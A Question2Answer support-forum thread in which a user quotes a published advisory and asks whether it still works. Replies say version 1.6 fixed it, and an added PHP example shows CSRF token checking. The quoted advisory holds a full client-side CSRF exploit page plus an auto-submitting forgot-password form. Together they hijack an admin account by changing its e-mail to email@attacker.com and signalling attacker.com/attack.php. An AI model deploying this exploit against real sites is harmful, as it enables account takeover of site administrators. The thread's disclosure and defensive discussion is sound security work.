+3 votes
5.8k views
in Q2A Core by
Hi,

Found this article "Exploit for stealing admin's account in Question2Answer".

Is this still a problem? I don't understand how this works, or if it works:
 
Here is an exploit for stealing the admin's account in Question2Answer. This exploit uses a Cross-Site Request Forgery vulnerability at http://site/account and Insufficient Anti-automation vulnerabilities at http://site/forgot and http://site/reset, which I've described in the second advisory about Question2Answer (http://websecurity.com.ua/6192/).

It will work in all affected versions of Question2Answer (and the second part of the attack will work at default settings). If the admin of the target site has changed the default settings and set up a captcha at http://site/forgot, then the server-side part of the attack can be done manually after conducting the CSRF attack.

The client-side part of the exploit does the following (code provided below):

1. Changes the e-mail of the user or admin via CSRF.
2. Starts the server-side part of the exploit via a request to attack.php.

The server-side part of the exploit (attack.php) does the following (algorithm):

After receiving the signal from the client-side part of the exploit, attack.php does the following:

1. Sends a POST request to http://site/forgot:
 
<body onLoad="document.hack.submit()"> 
<form name="hack" action="http://site/forgot" method="post"> 
<input type="hidden" name="emailhandle" value="email@attacker.com"> 
<input type="hidden" name="doforgot" value="1"> 
</form> 
</body> 
 
2. Checks the mailbox for a letter with the code:

Code: 4f84yl1d

This line contains the code for resetting the password.

3. Sends a GET request to http://site/reset with this code:

http://site/reset&c=4f84yl1d&e=email%40attacker.com

4. The new password is sent to the attacker's e-mail.

Code of the client-side exploit for stealing the admin's account in Question2Answer:
 
<html>
<head>
<title>Exploit for stealing admin's account in Question2Answer. Made by MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
  // Two hidden iframes: one per forged form submission.
  for (var i=1;i<=2;i++) {
    var ifr = document.createElement("iframe");
    ifr.setAttribute('name', 'csrf'+i);
    ifr.setAttribute('width', '0');
    ifr.setAttribute('height', '0');
    document.body.appendChild(ifr);
  }
  CSRF1();
  setTimeout(CSRF2,1000);
}
// Step 1: change the logged-in user's e-mail via a forged POST to /account.
function CSRF1() {
  window.frames["csrf1"].document.body.innerHTML = '<form name="hack" action="http://site/account" method="post">\n<input type="hidden" name="handle" value="test">\n<input type="hidden" name="email" value="email@attacker.com">\n<input type="hidden" name="messages" value="1">\n<input type="hidden" name="mailings" value="1">\n<input type="hidden" name="field_1" value="test">\n<input type="hidden" name="field_2" value="test">\n<input type="hidden" name="field_3" value="test">\n<input type="hidden" name="dosaveprofile" value="1">\n</form>';
  window.frames["csrf1"].document.hack.submit();
}
// Step 2: signal the server-side part (attack.php) to start the reset flow.
function CSRF2() {
  window.frames["csrf2"].document.body.innerHTML = '<form name="hack" action="http://attacker.com/attack.php" method="post">\n<input type="hidden" name="do" value="1">\n</form>';
  window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>
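
The server-side check that stops step 1 of the quoted attack, as an added example that is not Question2Answer's own code (1.6 shipped its own form security code): a per-session token bound to the form action and required on the profile-save POST, so a form forged from another origin arrives without it. The session handling and the hidden-field name `code` are assumptions made for this example.

```php
<?php
// Added example, not Question2Answer's code. Assumes a PHP session is active.

function csrf_token_for(string $action): string {
    if (empty($_SESSION['csrf_secret'])) {
        $_SESSION['csrf_secret'] = bin2hex(random_bytes(32));
    }
    // Bind the token to this session's secret and to the specific form action.
    return hash_hmac('sha256', $action, $_SESSION['csrf_secret']);
}

function csrf_token_valid(string $action, ?string $submitted): bool {
    if (empty($_SESSION['csrf_secret']) || $submitted === null) {
        return false;
    }
    // Constant-time comparison against the expected token.
    return hash_equals(csrf_token_for($action), $submitted);
}

// When rendering the account form, embed the token as a hidden field.
// A page on attacker.com cannot read it, so its forged POST lacks it.
function render_account_form(string $email): string {
    $tok = htmlspecialchars(csrf_token_for('saveprofile'), ENT_QUOTES);
    return '<form action="/account" method="post">'
         . '<input type="hidden" name="code" value="' . $tok . '">'
         . '<input name="email" value="' . htmlspecialchars($email, ENT_QUOTES) . '">'
         . '<input type="submit" name="dosaveprofile" value="Save">'
         . '</form>';
}

// On the POST, refuse the e-mail change unless the token matches.
function handle_account_post(array $post): string {
    if (!isset($post['dosaveprofile'])) {
        return 'nothing to do';
    }
    if (!csrf_token_valid('saveprofile', $post['code'] ?? null)) {
        return 'rejected: missing or invalid form security code';
    }
    // ... update the profile (e-mail etc.) here ...
    return 'profile saved';
}

session_start();
// Forged request like the one in the advisory: no token, so it is rejected.
echo handle_account_post(['dosaveprofile' => '1', 'email' => 'email@attacker.com']), "\n";
// Same-origin submission carrying the token from the rendered form: accepted.
$legit = ['dosaveprofile' => '1', 'email' => 'me@example.com', 'code' => csrf_token_for('saveprofile')];
echo handle_account_post($legit), "\n";
```

The second part of the attack (unthrottled /forgot and /reset) is a separate gap; a captcha or per-address rate limit on those endpoints, as the advisory itself notes, makes the manual fallback the attacker's only option even if the e-mail change had gone through.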

3 Answers

+1 vote
by
As I remember, Q2A has been protected against CSRF since v1.6 beta, and if you are using the latest version you will be safe.
+1 vote
by

This has been fixed with: Version 1.6 beta 1 (changelog)

I once suggested a workaround for people who do not want to or cannot upgrade: http://www.question2answer.org/qa/22722/exploits-the-admin-can-put-htpasswd-and-htaccess-admin-folder (however, it only protects the admin).

Greetings,
Kai

+1 vote
by

The others are correct, this has been fixed in 1.6. If you are using an earlier version you should upgrade to the latest version (1.6.3) asap.

Also, note that this was an obscure and difficult-to-accomplish exploit. It required that a user first visit the attacker's site, which submits a form to change the email on their account. That in itself requires knowledge of a specific site (the user might not have an account there) and requires the user to be logged in.

...